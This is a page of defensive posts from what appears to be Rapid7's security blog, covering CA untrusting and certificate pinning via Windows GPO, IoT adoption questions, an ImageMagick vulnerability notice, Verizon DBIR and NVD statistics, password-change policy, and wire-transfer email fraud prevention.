Skip navigation
All Places > Information Security > Blog
1 2 3 Previous Next

Information Security

649 posts

Situations come up relatively frequently where a specific certificate authority, trusted by browsers and operating systems, acts in a way that the users of those products would consider untrustworthy.

 

In the enterprise, with services exposed to the Internet and employees traveling, working from Wi-Fi and other insecure connections, this is also a very important issue, as the use of some of these less than tasteful certificates could lead to data (and credential!) interception.

 

Fortunately, if you manage Windows systems, you can not only configure the list of trusted authorities, but you can also pin the appropriate one for each service you use.

 

Untrusting Certificate Authorities on Windows via GPO

 

Filippo Valsorda, from Cloudflare, discovered and disclosed that Symantec had created an intermediate certificate authority (CA) for Blue Coat, a company that provides network devices with the ability to inspect SSL/TLS.

 

While there are legitimate uses to these features in the enterprise, such a CA could allow anyone using it to intercept encrypted traffic. This is not the first time, and will probably not be the last time something like this happens, so being ready to revoke certificate authorities is an ability enterprises must have.

 

Filippo also posted a great tutorial on how to revoke it on OS X and now links to Windows instructions but this article also covers pinning and goes into a bit more detail.

 

In this post, we will look at doing it on Windows, in an Active Directory environment.

 

Whitelist Versus Blacklist

 

Windows does allow you to fully configure certificate authorities, which would be ideal from a security perspective, to keep full control of the approved authorities, but which would result in a whitelist approach, requiring additional management effort as it involves replacing the certificates on all systems via GPO, which could risk breaking custom certificates installed for legitimate purposes. This should be a longer term goal, but a blacklist approach can still be used right away.

 

In this case, start by downloading the certificate you want to block as a .crt file.

 

Create A Group Policy Object (GPO)

 

You could use an existing GPO, or create a new one. The important thing to consider is that this will be a computer policy, that should be linked to the OUs where your workstations are located. As with any GPO changes, it is highly recommended to first link and filter this policy to specific testing workstations, considering a mistake could end up breaking SSL/TLS connectivity on workstations.

 

create_gpo.png

 

Edit the GPO, and under Computer Configuration/Windows Settings/Security Settings/Public Key Policies/Untrusted Certificates, right click in the right pane to get the Import option.

 

import.png

 

The first wizard screen has greyed out options, as we are modifying a GPO. On the second one, simply browse to the CRT you downloaded. Ensure the imported certificate gets placed in Untrusted Certificates.

 

At this point, your GPO should look like this, and is ready to block this certificate from the Windows store on all machines where it is deployed.

 

GPO_output.png

 

Pinning Certificate Authorities Via GPO

 

Revoking known bad certificates is one thing, but a very reliable way to ensure bad certificates have no impact on corporate services is to pin those. Pinning essentially configures the client device to only accept known good values for pre-configured SSL/TLS communications.

 

Pinning can be done very granularly, at the certificate/public key level, which would require a lot of management, but it can also be done at the certificate authority level, which is much easier to manage.

 

This would allow us to configure systems to only expect, for example, that communications to the Rapid7 website should use GoDaddy certificates.

 

Rapid7dotcom.png

 

By applying this to the services used by traveling employees, you can ensure that captive portals, hotel and plane Wi-Fi environments or even malicious attacks at the ISP levels would require forging a certificate of that very specific authority, and would prevent the use of another illegitimate yet trusted certificate.

 

Deploy EMET

 

Deployment of EMET has already been covered in our whiteboard Wednesdays briefly, and Microsoft includes great information about it with the installer. EMET must be deployed to the workstations where you wish to pin certificates, and while other EMET mitigations are great for security, they are not covered in this post, where we will focus only on certificate management.

 

Create A GPO For EMET

 

Again, a policy that applies to the appropriate computer objects must be created.

 

EMET itself comes with the appropriate files to create GPOs, located under Program Files\EMET\Deployment\Group Policy Files.

 

1. Copy the ADMX to <SystemDrive>\Windows\PolicyDefinitions

2. Copy the ADML to  <SystemDrive>\Windows\PolicyDefinitions\en-US folder

3. Re-open the GPO Management Console

4. You now have a new set of GPO options available under Computer Configuration\Administrative Template\Windows Components\EMET

5. Enable Certificate Pinning Configuration.

6. In Pinned Sites, list all URLs you want to protect, as well as the name of the rule we will create.

7. In Pinning Rules, use the same rule name, then list the thumbprints (SHA-1) of the certificates to accept, or of their authorities. These rules can get very granular, include expiration dates and more - please read the examples provided by Microsoft if you would like to use such advanced rules. Using the EMET GUI, when starting, can allow you to see the types of rules that can be created with more ease than editing those relatively unfriendly GPOs.

8. In our example, I configure www.rapid7.com to only trusted a SHA-1 thumbprint of OBVIOUSLYNOTAREALTHUMBPRINT. We configured this to be a blocking rule, that expires on Christmas 2020.

 

GPO.png

 

9. If you run the EMET GUI on a system where the GPO is applied, you'll see the new rule being applied, denoted by the icon showing it is coming from a GPO.

 

fromGPO.png

10. If we now browse to Rapid7's website, we get a certificate warning, since the real certificate does not match the fake thumbprint. This is what would happen if a trusted but illegitimate certificate was at play in a man-in-the-middle-attack.

 

certwarning.png

 

11. EMET logs an error to the Event Log, which you should absolutely detect and investigate.

 

event.png

 

12. Repeat this for all important services you use, such as webmail, single sign-on portals, reverse proxies, SaaS providers. Additional protection for social network accounts can also be achieved this way.

 

Warning: Edge does not seem to support this feature yet. You should also look into configuring any alternate browsers in use with similar rules, to obtain better coverage. Again, this is the type of change that should be tested very well before being pushed to a significant amount of workstations, but once done, you will have significantly reduced the chances of a man-in-the-middle attack, and augmented the odds of detecting them.

 

Enjoy your new GPOs!

Suchin Gururangan and I (I'm pretty much there for looks, which is an indicator that jenellis might need prescription lenses) will be speaking at SOURCE Boston this week talking about "doing data science" at "internet scale" and also on how you can get started doing security data science at home or in your organization.  So, come on over to learn more about the unique challenges associated with analyzing "security data", the evolution of IPv4 autonomous systems, where your adversaries may be squirreled away and to find out what information lies hidden in this seemingly innocuous square:

 

all.png

This blog post was written by Bob Rudis, Chief Security Data Scientist and Deral Heiland, Research Lead.

 

Organizations have been participating in the “Internet of Things” (IoT) for years, long before marketers put this new three-letter acronym together. HVAC monitoring/control, badge access, video surveillance systems and more all have had IP connectivity for ages. Today, more systems, processes and (for lack of a more precise word) gizmos are being connected to enterprise networks that fit into this IoT category. Some deliberately; some not.

 

network-782707_960_720.png

 

As organizations continue down the path of adoption of IoT solutions into their environments they are faced with a number of hard questions, and in some ways they may not always know what those questions are. In an attempt to help them avoid falling into a potentially deep and hazardous IoT pit, we’ve put together a few key questions that may help adopters better embrace and secure IoT technology within their organizations.

 

  1. What’s already there?
  2. Do we really need this? (i.e. making the business case for IoT)
  3. How does it connect and communicate (both internally and externally)?
  4. How is it accessed and controlled? (i.e. is there an “app for that” and who has access)
  5. What is the classification of the data? ( i.e. data handled and processed by IoT)
  6. Can we monitor and maintain these IoT devices?
  7. What are the failure modes? (i.e. what breaks if it breaks?)
  8. How does it fit in our threat models? (i.e. what is the impact if compromised?)

 

What’s already there?

This should be the first question. If you can’t answer it right now, you need to work with your teams to inventory what’s out there. By default, these devices are on your network, so you should be able to use your network scanner to find and inventory them. Work with your vendor to ensure they have support for identifying IoT devices.

 

Short of that, work with your procurement teams to see what products have been purchased that may have an IoT component. You should be able to do this by vendor or device name (you may need to look on the itemized purchase orders). Put out a call to action to your department peers to see what they may have deployed without your knowing that may not have shown on the books. Building/campus maintenance and security, app development, and system/app/network architecture departments are good places to start.

 

Do we really need this?

Let’s face it, these “things” are pretty cool and many of them are highly useful. It’s much more efficient being able to deploy cameras or control environmental systems within a building or campus by using modern network protocols and spiffy apps. But, do you really need internet-enabled lights, televisions, and desktop assistants? Yeah, we’re looking at you, Alexa. The novelty effect of IoT should make “why” the first question you ask when considering investing in new “things," quickly followed by “what value does this bring to our organization”. If the answers do not meet the standards your organization has identified, then you should probably curb your IoT enthusiasm for a bit or consider deploying the technology in an isolated environment, with strong access controls to limit or prevent connectivity to the organizations internal systems.

 

There are good business cases for IoT: increased efficiency, cost reduction, service/feature enhancements and more. You may even be in a situation where the “cool factor” is needed to attract new employees or customers. Only you know what meets the threshold of “need."

 

How does it connect and communicate?

There are many aspects to the concept of “communication” in IoT. Does it connect to the LAN, Wi-Fi network and/or 3G/4G for access/control? Does it employ ZigBee, Bluetooth or other low-power and/or mesh network features for distributed or direct communications? Does it use encryption for all, some or any communications? Can it work behind an authenticated proxy server or does it require a direct internet connection? What protocols does it use for communication?

 

Most of these are standard questions on any new technology adoption within an organization. One issue with communications and IoT devices is that their makers tend to not have enterprise deployments in mind and the vast majority require direct internet connections, communicate without encryption and use new, low-power communication technologies to transmit data and control commands in clear text.

 

An advertised feature of many IoT devices is that they store your data in “the cloud." Every question you currently ask about cloud deployments in your organization apply to IoT devices. The cloud connection and internal connection effectively make these “things” a custom data router from your network to some other network. Once you enable that connection, there’s almost nothing stopping it from going the other way. Be wary of sacrificing control for “cool."

 

To get answers to these questions, don’t just trust the manufacturer. Hold your own Proof of Concept deployment in controlled environments and monitor all communications as you change settings. Your regulatory requirements or just internal policy requirements may make the use of many IoT devices impossible without filing an exception and accepting the risks associated with the deployment.

 

How is it accessed and controlled?

IoT is often advertised as a plug-and-play technology. This means the builders tried to remove as much friction as possible from deployments to drive up adoption. This focus on ease-of-use is aimed at casual consumers but many IoT devices have no “enterprise” counterpart. That is, you deploy the same exact devices in the same exact way both “at home” and “at work”. This means many devices will have no password or use only a simple static password versus more detailed or elaborate controls that you are used to in an enterprise. The vast majority have no concept of or support for two-factor or multi-factor authentication. If you think access control is weak, most have no concept of encryption when it comes to any communication channel. If the built-in controls do not conform with your standard requirements consider isolating the “management” side within a separate network - if that’s possible.

 

IoT device access is often done through a mobile app or web (internet) console. How are these mechanisms secured? How is the authentication and/or data secured in transit and on disk? Again, all the cloud service questions you already ask are valid here and you should be wary of relaxing standards without significant benefits.

 

What is the classification of the data?

Another key action to perform when deciding on implementing an IoT solution is to examine the data that is gathered and stored by these devices. By reviewing the data and properly classifying it within defined categories, we can better approach how the data gathered, transmitted, and stored within our environment. This will also help us make better informed decisions when we are faced with IoT technologies that store data in the cloud, or ones that also transmit voice and video information to the cloud. Data classification policy and procedures are important to all businesses to assure that all data is being properly handled within the organization. If you do not have such a practice it is highly recommended that one is developed and that IoT data is included in those policy and procedures.

 

The Department of Energy—in conjunction with Sandia National Labs—has put together a guide to developing a Security Framework for Control System Data Classification and Protection[1] that can help you get started when applying data classification strategies to your own Internet of Things.

 

Can we monitor and maintain these IoT devices?

Unlike servers, routers, switches and firewalls, IoT makers tend to sacrifice manageability for the ability to pack in cool features. The idea of monitoring is a notice when a device fails to phone home or fails to upload data in a preset time interval. Expecting to use SNMP or an ssh connection to gain management telemetry should not be an assumption you make lightly. Verify and test management options before committing to a solution.

 

Patch management is also a critical concern when dealing with IoT technology. In this case we have to consider the full ecosystem of the IoT solution deployed, which could include the control hardware firmware, sensor hardware firmware, server software, and associated mobile application software. Ensuring that all segments are included in a comprehensive patch management solution can be difficult. Based on the IoT technology deployed, there may not be vendor automation patching available. If this is the case then a self-managed solution will need to be implemented.

 

What are the failure modes?

Often overlooked when considering the deployment of any technology but specially with IoT, what happens if the technology fails to operate correctly? Can the business proceed without these services when failure leads to security breakdown or loss of critical data? If so, then it is important that we identify methods to mitigate or reduce the impact of these failures, which may include introducing needed redundancies.

 

If you have no current process in place to analyze failure modes, a great place to start is by using a cyber-oriented failure

mode and effect analysis (FMEA) framework[2] or something like Open FAIR[3] (factor analysis of information risk). Both enable you to quantify outcomes of scenarios and helps combat the urge to “make a gut call” on when considering the possible negative outcomes from IoT deployments.

 

How does it fit within our threat models?

This question needs to be asked in tandem with the failure modes investigation. No system or device sits in isolation on your network, and attackers use the interconnectedness of systems to move laterally and find points of exposure to work from. You should be threat modeling your proposed IoT deployments the same way you do everything else. Look at where it lives, what lives around it and what it does (including the data it transmits and what else it connects to, especially externally). Map out this graph to make sure it fits in within the parameters of your current threat models and expand them only if you absolutely have to.

 

The Internet of Things holds much promise, profit, and progress but with that comes real risk and tangible exposure. We should not be afraid to embrace this technology, but should do so in the safest and most secure ways possible. We hope these questions help you better risk assess IoT you already have and will be adopting.

 


[1] Security Framework for Control System Data Classification and Protection: http://energy.gov/sites/prod/files/oeprod/DocumentsandMedia/21-Security_Framewor k_for_Data_Class.pdf

[2] Christoph Schmittner, Thomas Gruber, Peter Puschner, and Erwin Schoitsch. 2014. Security Application of Failure Mode and Effect Analysis (FMEA). In Proceedings of the 33rd International Conference on Computer Safety, Reliability, and Security - Volume 8666 (SAFECOMP 2014), Andrea Bondavalli and Felicita Di Giandomenico (Eds.), Vol. 8666. Springer-Verlag New York, Inc., New York, NY, USA, 310-325. DOI=http://dx.doi.org/10.1007/978-3-319-10506-2_21

[3] The OpenFAIR body of knowledge: http://www.opengroup.org/subjectareas/security/risk

ImageMagick Vulnerabilities and Exploits

 

On Tuesday, the ImageMagick project posted a vulnerability disclosure notification on their official project forum regarding a vulnerability present in some of its coders. The post details a mitigation strategy that seems effective, based on creating a more restricted policy.xml that governs resource usage by ImageMagick components.

 

Essentially, the ImageMagick vulnerabilities are a combination of a type of confusion vulnerability (where the ImageMagick components do not correctly identify a file format) and a command injection vulnerability (where the filtering mechanisms for guarding against shell escapes are insufficient).

 

How worried should I be?

 

The reason for the public disclosure in the first place is due to the vulnerabilities being exploited already by unknown actors, as reported by Ryan Huber. As predicted by him, published exploits by security researchers targeting the affected components are emerging in short order, including a Metasploit module authored by William Vu and HD Moore.

 

As reported by Dan Goodin, ImageMagick components are common in several web application frameworks, so the threat is fairly serious for any web site operator that is using one of those affected technologies. Since ImageMagick is a component used in several stacks, patches are not universally available yet.

 

What's next?

 

Website operators should immediately determine their use of ImageMagick components in image processing, and implement the referenced policy.xml mitigation while awaiting an updated package that fixes the identified vulnerabilities. Restricting file formats accepted by ImageMagick to just the few that are actually needed, such as PNG, JPG, and GIF, is always a good strategy for those sites where it makes sense to do so. ImageMagick parses hundreds of file formats, which is part of its usefulness.

 

Are any Rapid7 products affected?

No Rapid7 products are affected by this vulnerability.

Verizon has released the 2016 edition of their annual Data Breach Investigations Report (DBIR). Their crack team of researchers have, once again, produced one of the most respected, data-driven reports in cyber security, sifting through submissions from 67 contributors and taking a deep dive into 64,000+ incidents—and nearly 2,300 breaches—to help provide insight on what our adversaries are up to and how successful they've been.

 

The DBIR is a highly anticipated research project and has valuable information for many groups. Policy makers use it to defend legislation; pundits and media use it to crank out scary articles; other researchers and academics take the insights in the report and identify new avenues to explore; and vendors quickly identify product and services areas that are aligned with the major findings. Yet, the data in the report is of paramount import to defenders. With over 80 pages to wade through, we thought it might be helpful to provide some way-points that you could use to navigate through this year's breach and incident map.

 

Bigger is…Better?

 

There are a couple "gotchas" with data submitted to the DBIR team. The first is that a big chunk of data comes from the U.S. public sector where there are mandatory reporting laws, regulations, and requirements. The second is the YUGE number of Unknowns. The DBIR acknowledges this, and it's still valuable to look at the data when there are "knowns" even with this grey (okay, ours is green below) blob of uncertainty in the mix. You can easily find your industry in DBIR Tables 1 & 2 (pages 3 & 4) and if we pivot on that data we can see the distribution of the percentage of incidents that are breaches:

 

2016-verizon-data-breach-report-fig-1-1.png

We've removed the "Public (92)" industry from this set to get a better sense of what's happening across general industries. For the DBIR, there were more submissions of incidents with confirmed data disclosure for smaller organizations than large (i.e. be careful out there SMBs), but there's also a big pile of Unknowns:

 

2016-verizon-data-breach-report-fig-2-1.png

We can also take another, discrete view of this by industry:

 

2016-verizon-data-breach-report-fig-3-1.png

 

(Of note: it seems even the Verizon Data Breach Report has "Unknown Unknowns")

 

As defenders, you should be reading the report with an eye for your industry, size, and other characteristics to help build up your threat profiles and help benchmark your security program. Take your incident to breach ratio (you are using VERIS to record and track everything from anti-virus hits to full on breaches, right?) and compare it to the corresponding industry/size.

 

The Single Most Popular Valuable Chart In The World! (for defenders)

 

When it comes right down to it, you're usually fighting an economic battle with your adversaries. This year's report, Figure 3 (page 7) shows that the motivations are still primarily financial and that Hacking, Malware and Social are the weapons of choice for attackers. We'll dive into that in a bit, but we need to introduce our take on DBIR Figure 8 (page 10) before continuing:

 

2016-verizon-data-breach-report-fig-4-1.png

We smoothed out the rough edges from the 2016 Verizon Data Breach Report to figure to paint a somewhat clearer picture of the overall trends, and used a complex statistical transformation (i.e. subtraction) to just focus on the smoothed gap:

 

2016-verizon-data-breach-report-fig-5-1.png

 

Remember, the DBIR data is a biased sample from the overall population of cyber security incidents and breaches that occur and every statistical transformation introduces more uncertainty along the way. That means your takeaway from "Part Deux" should be "we're not getting any better" vs "THE DETECTION DEFICIT TOPPED 75% FOR THE FIRST TIME IN HISTORY!"

 

So, our adversaries are accomplishing their goals in days or less at an ever-quickening success rate while defenders are just not keeping up at all. Before we can understand what we need to do to reverse these trends, we need to see what the attackers are doing. We took the data from DBIR Figure 6 (page 9) and pulled out the top threat actions for each year, then filtered the result to the areas that match both the major threat action categories and the areas of concern that Rapid7 customers have a keen focus on:

 

2016-verizon-data-breach-report-fig-6-1.pngSome key takeaways:

  • Malware and hacking events dropping C2s are up
  • Key loggers are making a comeback (this may be an artifact of the heavy influence of Dridex in the DBIR data set this year)
  • Malware-based exfiltration is back to previously seen levels
  • Phishing is pretty much holding steady, which is most likely supporting the use of compromised credentials (which is trending up)

 

Endpoint monitoring, kicking up your awareness programs, and watching out for wonky user account behavior would be wise things to prioritize based on this data.

 

Not all Cut-and-Dridex

The Verizon Data Breach Report mentions Dridex 13 times and was very up front about the bias it introduced in the report. So, how can you interpret the data with "DrideRx" prescription lenses? Rapid7's Analytic Response Team notes that Dridex campaigns involve:

 

  • Phishing
  • Endpoint malware drops
  • Establishment of command and control (C2) on the endpoint
  • Harvesting credentials and shipping them back to the C2 servers

 

This means that—at a minimum—the data behind the Data Breach Investigations Report, Figures 6-8 & 15-22, impacted the overall findings and Verizon itself warns about broad interpretations of the Web App Attacks category:

 

"Hundreds of breaches involving social attacks on customers, followed by the Dridex malware and subsequent use of credentials captured by keyloggers, dominate the actions."

 

So, when interpreting the results, keep an eye out for the above components and factor in the Dridex component before tweaking your security program too much in one direction or another.

 

Who has your back?

 

When reading any report, one should always check to make sure the data presented doesn't conflict with itself. One way to add a validation to the above detection deficit is to look at DBIR Figure 9 (page 11) which shows (when known) how breaches were discovered over time. We can simplify this view as well:

 

2016-verizon-data-breach-report-fig-7-1.pngIn the significant majority of cases, defenders have law enforcement agencies (like the FBI in the United States) and other external parties to "thank" for letting them know they've been pwnd. As our figure shows, we stopped being able to watch our own backs half a decade ago and have yet to recover. This should be a wake-up call to defenders to focus on identifying how attackers are getting into their organizations and instrumenting better ways to detect their actions.

 

Are you:

 

  • Identifying critical assets and access points?
  • Monitoring the right things (or anything) on your endpoints?
  • Getting the right logs into the right places for analysis and action?
  • Deploying honeypots to catch activity that should not be happening?

 

If not, these may be things you need to re-prioritize in order to force the attackers to invest more time and resources to accomplish their goals (remember, this is an battle of economics).

 

Are You Feeling Vulnerable?

 

Attackers are continuing to use stolen credentials at an alarming rate and they obtain these credentials through both social engineering and the exploitation of vulnerabilities. Similarly, lateral movement within an organization also relies—in part—on exploiting vulnerabilities. DBIR Figure 13 (page 16) shows that as a group, defenders are staying on top of current and year-minus-one vulnerabilities fairly well:

 

dbirfig13.png

We're still having issues patching or mitigating older vulnerabilities, many of which have tried-and-true exploits that will work juuuust fine. Leaving these attack points exposed is not helping your economic battle with your adversaries, as letting them rely on past R&D means they have more time and opportunity. How can you get the upper-hand?

 

  • Maintain situational awareness when it comes to vulnerabilities (i.e. scan with a plan)
  • Develop a strategy patching with a holistic focus, not just react to "Patch Tuesday"
  • Don't dismiss mitigation. There are legitimate technical and logistic reasons that can make patching difficult. Work on developing a playbook of mitigation strategies you can rely on when these types of vulnerabilities arise.

 

"Threat intelligence" was a noticeably absent topic in the 2016 DBIR, but we feel that it can play a key role when it comes to defending your organization when vulnerabilities are present. Your vuln management, server/app management, and security operations teams should be working in tandem to know where vulnerabilities still exist and to monitor and block malicious activity that is associated with targets that are still vulnerable. This is one of the best ways to utilize all those threat intel feeds you have gathering dust in your SIEM.

 

There and Back Again

 

This post outlined just a few of the interesting markers on your path through the Verizon Data Breach Report. Keep a watchful eye on the Rapid7 Community for more insight into other critical areas of the report and where we can help you address the key issues facing your organization.


(Many thanks to Rapid7's Roy Hodgman and Rebekah Brown for their contributions to this post.)

 

Related Resources:

 

Watch my short take on this year's Verizon Data Breach Investigations Report.

 

DBIR video.png

Join us for a live webcast as we dig deeper into the 2016 Verizon Data Breach Investigations Report findings. Tuesday, May 10 at 2PM ET/11AM PT. Register now!

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

I'm often asked by friends and colleagues: Why do I have to change my password every 30 or 60 days? My response is always the same: Odds are good that it’s because that's the way that it's always been done. Or, these people might have a super strict IT manager who likes to show - on paper - that his or her environment is "locked down." Occasionally I will get feedback that auditors require such stringent settings. The funny thing is, there's never really a good business reason behind such short-term password changes.

 

In fact, if you dig in further, in many cases there are numerous other issues that are a much higher risk than passwords that are not changed often. I often see weak password requirements – i.e. complexity not being enforced or 6-character minimum lengths. I often see this combined with super weak endpoint security such as minimal Windows patching, no third-party software patching, no full disk encryption, and network monitoring/alerting that is reactive at best.

So, why is it that we go with the 30, 60, or 90-day password change requirements? I don't think it's malicious but I do believe that people just aren't taking the time to think about what they're doing. In fact that's sort of the essence of many security challenges that businesses face today. People just aren’t thinking about what they're actually doing. They're going through the motions with their “policies” and they have these fancy technologies deployed but, in reality, the implementation of everything stinks. At the end of the day, management assumes that all is well because of all of the money and effort being spent on these issues (including those pesky password changes) but, yet, they still get hit with breaches and no one can figure out why.

 

I think many seasoned IT and security professionals would agree with me in that quick turnarounds on password changes is actually bad for security. We always joke about how users will write down their passwords on the sticky notes – and it's true! But it goes deeper than the humor. There's a strong political factor at the root of much of the password nonsense. Users don't want to have to create and remember long passwords.

 

After all, odds are they’ve never been taught/guided to use passphrases that are super simple to create and remember yet impossible to crack. Furthermore, management doesn't want to hear about it so IT doesn't press the issue. Thus the ignorant cycle of if we can't make them use strong passphrases, we can at least require quick password changes. The madness continues and it’s bad for business.

 

Anytime you create complexity and, in this case, requiring users to continually change their passwords – whether or not they’re suspected to have been compromised – you create more problems than you solve in most cases. There are always exceptions and compensating controls such as intruder lockout, two-factor authentication, and proactive system monitoring can thwart most attacks on user accounts. It’s time to look past the nonsense and capitalize on opportunities such as this to get people on our side rather than continue ticking them off.

This is a guest post by Ismail Guneydas. Ismail Guneydas is senior technical leader with over ten years of experience in vulnerability management, digital forensics, e-Crime investigations and teaching. Currently he is a senior vulnerability manager at Kimberly-Clark and an adjunct faculty at Texas A&M. He has M.S.  in computer science and MBA degrees.

 

2015 is in the past, so now is as good a time as any to get some numbers together from the year that was and analyze them.  For this blog post, we're going to use the numbers from the National Vulnerability Database and take a look at what trends these numbers reveal.

 

Why the National Vulnerability Database (NVD)?  To paraphrase Wikipedia for a moment, it's a repository of vulnerability management data, assembled by the U.S. Government, represented using the Security Content Automation Protocol (SCAP). Most relevant to our exercise here, the NVD includes databases of security-related software flaws, misconfigurations, product names, impact metrics—amongst other data fields.

By pouring through the NVD data from the last 5 years, we're looking to answer following questions:

  • What are the vulnerability trends of the last 5 years, and do vulnerability numbers indicate anything specific?
  • What are the severities of vulnerabilities? Do we have more critical vulnerabilities or less?
  • What vendors create most vulnerable products?
  • What products are most vulnerable?
    • Which OS? Windows OSX, a Linux distro?
    • Which mobile OS? IOS, Android, Windows?
    • Which web browser? Safari, Internet Explorer, Firefox?

 

Vulnerabilities Per Year

VulnerabilitiesPerYear.jpg

 

That is correct! Believe it or not, there was a 20% drop in the number of vulnerabilities compared to the number of vulnerabilities in 2014. However, if you look at the overall trending growth in the last 5 years, the 2015 number seems to be consistent with the overall growth rate. The abnormality here was the 53% increase in 2014. If we compare 2015's numbers with 2013, then we see  24% increase.

 

All in all though, this doesn't mean we didn't have an especially bad year as we did in 2014 (the trend shows us we will have more vulnerabilities in the next few years as well). That's because when we look closely at the critical vulnerabilities, we see something interesting. There were more critical vulnerabilities in 2015 then 2014. In 2014 we had more vulnerabilities with CVSS 4, 5, and 6; however, 2015 had more vulnerabilities with CVSS 7, 8, 9 and 10!

 

Vulnerability-Distro-By-CVSS-Score.jpg

As you see above there are 3376 critical vulnerabilities in 2015 where as there were only 2887 critical vulnerabilities in 2014. (That is a 17% increase.)

 

In other words, the proportion of critical vulnerabilities is increasing overall. That means we need to pay close attention to our vulnerability management programs and make sure they are effective—fewer false positives and negatives—up-to-date with recent vulnerabilities, and faster with shorter scan times.

 

Severity of Vulnerabilities

This chart shows weight distribution of 2015 vulnerabilities, based on CVSS score. As (hopefully) most of you know, 10 is the highest/most critical level, whereas 1 is the least critical level.

CVSS-Score-.jpg

 

There are many vulnerabilities with CVSS 9 and 10. Let's check following graph that gives more clear picture:

 

Weighted-Average.jpg

This means 36% of the vulnerabilities were critical (CVSS >=7). The average CVSS is 6.8 so that is at the boundary to be critical.

 

The severity of vulns is increasing, but this isn’t to say it’s all bad. In fact, it really exposes a crucial point: That you have to be deploying a vulnerability management program that separates the weak from the chaff. Effective vulnerability management program will help you to find and then remediate vulnerabilities in your environment.

 

Vulnerability Numbers Per Vendor

Let's analyze national vulnerability database numbers by checking vendors' vulnerabilities. The shifting tides in vulnerabilities doesn’t stop for any company, including Apple. The fact is there are always vulnerabilities, the key has to be detecting these before they are exploited.

 

Apple had the most number of vulnerabilities in 2015.  Of course with many iOS and OSX vulnerabilities out there in general, it's no surprise this number went up.

 

Here is the full list:

mostvulnerablevendors.jpg

 

Apple jumped from being number 5th in 2014.  Microsoft was number 3rd and Cisco was number 4th. Surprisingly Oracle (owner of Java) did well this year and took 4th place (they were number 2 last year). Congratulations (?) to Canonical and Novel, as they were not in top 10 list last year (they were 13rd and 15th).  So in terms of prioritization, with Apple making a big jump last year, if you have a lot of iOS in your environment, it's definitely time to  make sure you've prioritized those assets accordingly.

 

Here's a comparison chart that shows number of vulnerabilities per vendor for 2014 and 2015.

2014vs2015-Vendors.jpg

 

Vulnerabilities Per OS

In 2015, according to the NVD, OSX had the most vulnerabilities, followed by Windows 2012 and Ubuntu Linux.

MostVulnerableOS.jpg

 

Here most vulnerable Linux distro is Ubuntu. Opensuse is the runner up and then Debian Linux. Interestingly Windows 7, the most popular desktop application based on its usage, is reported to be less vulnerable then Ubuntu. (That may surprise a few people!)

 

Vulnerabilities Per Mobile OS

Picture12.png

 

IPhone OS has the highest number of vulnerabilities published in 2015. Windows and Android came after iPhone. 2014 was no different. iPhone OS had the highest number of vulnerabilities and Windows Rt and Android followed it.

 

Vulnerabilities Per Application

Picture10.png

Vulnerabilities Per Browser

Picture1.png

IE had highest number of vulnerabilities in 2015. In 2014, the order of product with the highest number of vulnerabilities were exactly same. (IE, Chrome, Firefox, Safari.)

 

Summary

Given the trends over the past few years reported via the NVD, we should expect more vulnerabilities to be published with higher CVSS score this year. Moreover, I predict that mobile OS will be hot area for security — as more mobile security professionals find and report mobile OS vulnerabilities, we'll see an increase in Mobile OS vulnerabilities as well.

 

It’s all about priorities. We only have so many hours in the day and resources available to us to remediate what we can. But if you take intel from something like the NVD and layer that over the visibility you have into your own environment, you can use this information to help build a good to-do list built by priorities, and not fear.

The FBI this week posted an alert that showed wire transfer scams bled $2.3 Billion from “business email compromise” from October 2013 through February 2016.  A couple of news outlets picked this up, including Brian Krebs.

 

When I was the head of security at a multi-national corporation, this was an issue that came up regularly. There were instances of very aggressive behavior, such as someone calling the call center pretending to be the CEO of one of the countries and demanding a $1 million dollar transfer. That was a very bold and very obvious fraud that the call center was able to handle. However, very often these requests came though email, just like the FBI reported.

 

When this happens, normally the scammer uses either a forged email domain very similar to the corporate one. If your user uses a browser without a fixed width font, they might get tricked into see the domain as legitimate, i.e.  rnicrosoft.com vs microsoft.com (look closely), or a use of a sub domain that looks very similar, i.e. yourcom.panyname.com. Then the header is simply forged. In simple mail clients, like Gmail, you have to take extra steps to see the actual sender domain.

 

 

The emails are usually pretty short, lacking detail, such as :

 

“I need you to immediately produce a wire transfer for $13,000 and sent to the bank listed. I will follow up with you later.

 

Regards,

CEO NAME”

 

And you might have a pdf attachment with banking details. Oddly enough, the PDFs I encountered were never malicious. They had legitimate account details so the wire transfers could be received.

 

Now you might think this is too simple and shouldn’t work. But obviously, it does, to the tune of $2.3 billion. You might ask yourself why, and if you aren’t, I’ll ask it for you. Self, why does this work?

 

Well consider that you might have a multibillion dollar corporation located in many countries. If you do business in certain countries, wire transfers are the norm. So wire transfers become part of a normal process for that company. And when someone asks for $13,000, or even as much as $75,000, for a company that posts $4.3 billion in revenue, they would not even blink an eye at this.

 

Scammers do a little recon, ask for an amount that is small to the company, and it gets processed. Little risk, high reward.

How would you protect against this?

 

The simplest method is verification of the request. The FBI suggests that a telephone call be placed to verify the request, which is a good practice. They also suggest two factor authentication for email, and limit social media activities, as scammers will do reconnaissance and determine if CEOs are traveling.

 

Krebs points out that some experts rely on technological controls such as DKIM and SPF. While these are things we recommend in our consultancy, they are complex for low maturity organizations and do require some effort and support. At the end of the day, they don’t actually solve the problem, because we are socially engineering human beings.

 

While all of these technology controls are good, we are dealing with humans. The best way to prevent this fraud from occurring is creating simple business processes that are enforced. In security terms, we would call this segregation of duties.

 

The simplest security

 

Simply put, segregation of duties says that no one person or one role should be allowed to execute a business process from start to finish. In the case of wire transfer fraud, for example, one person/role should not be able to create the wire transfer, approve it and execute it. Dividing these duties between two or more persons/roles means more eyes on the situation, and a potential to catch the fraud. A simple process map might look like:

 

 

Ensure that Role A and Role B have proper documentation (evidence) for each step of the request and approval, and you now have a specific security control that easily integrates into a business process. The key to enforcement: making sure every single request follows the chain every single time. No exceptions.

 

Now let me tell you about the one that almost made it.

 

There was one instance I dealt with which was one mouse click away from being executed.

 

An email (very similar to the example above) was sent to a director of finance, purportedly from the CEO. The director was busy that day, and filed the email away for processing later. By 4:55 pm or so, they realized they had not acted on the request. As it was almost end of day, and wire transfers are not processed by most banks after banking hours, she hurriedly forwarded the email to the wire transfer processor, marked with urgency, and made a call to ensure it was processed immediately. By the time it was picked up and put into the process, banks were closed. So they agreed it would execute first thing tomorrow morning.

 

That evening, a series of emails went back and forth between the approver, who was a simple finance analyst who held very firm to the process, and the requester. Though it had urgency, and people were shouting that it was a request from the CEO, the process prevailed.

 

